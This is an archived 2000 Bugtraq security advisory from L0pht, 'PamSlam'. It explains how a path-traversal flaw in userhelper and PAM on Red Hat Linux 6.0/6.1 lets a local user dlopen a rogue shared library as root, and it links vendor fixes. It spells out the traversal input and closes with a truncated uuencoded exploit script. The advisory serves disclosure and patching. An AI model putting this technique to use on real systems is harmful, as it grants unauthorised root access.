From dildog@L0PHT.COM Mon Jan 10 15:34:37 2000 From: Dildog To: BUGTRAQ@SECURITYFOCUS.COM Date: Tue, 4 Jan 2000 20:09:05 -0500 Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper L0pht Security Advisory Advisory Name: PamSlam Advisory Released: [01/04/00] Application: userhelper and PAM on Redhat Linux 6.0/6.1 Severity: A local user can gain root access. Status: Vendor contacted. Fix provided by vendor. Advisory released. Author: dildog@l0pht.com WWW: http://www.l0pht.com/advisories.html Overview: Both 'pam' and 'userhelper' (a setuid binary that comes with the 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper' being setuid means we can get root. Description: The combination of the fact that both userhelper and PAM follow .. paths allows us to craft up a file that causes userhelper (by way of PAM) to dlopen any shared object we want as root. The exploit is simple, and utilizes the '-w' option of userhelper, which lets us specify a program to run with the privileges designated by PAM. This tries to only execute programs that have entries in /etc/security/console.apps, but since we get to specify the name, something like ../../../tmp/myprog gets us a file open path that looks like /etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to keep a filename below a directory! After this hurdle, PAM is called to start up the binary, and it does the same thing, looking for the filename in /etc/pam.d. If we've placed a rogue pam.d configuration file in /tmp/myprog, then it can be pointed to /etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick a few shared libraries to dlopen, so at this point, we get root. The following exploit demonstrates this vulnerability by creating a 'rootshell library' that creates a shell when dlopened, creating a pam.d-style configuration file, and then running userhelper with the appropriately dotted path. Quick solution: Download the fix from RedHat at: Intel: ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm Alpha: ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm Sparc: ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm Red Hat Linux 6.0: Intel: ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm Alpha: ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm Sparc: ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm Exploit: Uudecode the following script. Run the script. begin 755 pamslam.sh M(R$O8FEN+W-H"B,*(R!P86US;&%M("T@=G5L;F5R86)I;&ET>2!I;B!2961H M870@3&EN=7@@-BXQ(&%N9"!004T@<&%M7W-T87)T"B,@9F]U;F0@8GD@9&EL M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I2!T:&%T(&-O;65S M('=I=&@@=&AE"B,@("`@)W5S97)M;V1E+3$N,34G(')P;2D@9F]L;&]W("XN M('!A=&AS+B!3:6YC92!P86U?"X@4F5M M96UB97(@)W-T2!M M861E(&UE(&1R:6YK(&UY(&UI;&LN"@IC870@/B!?<&%M7!E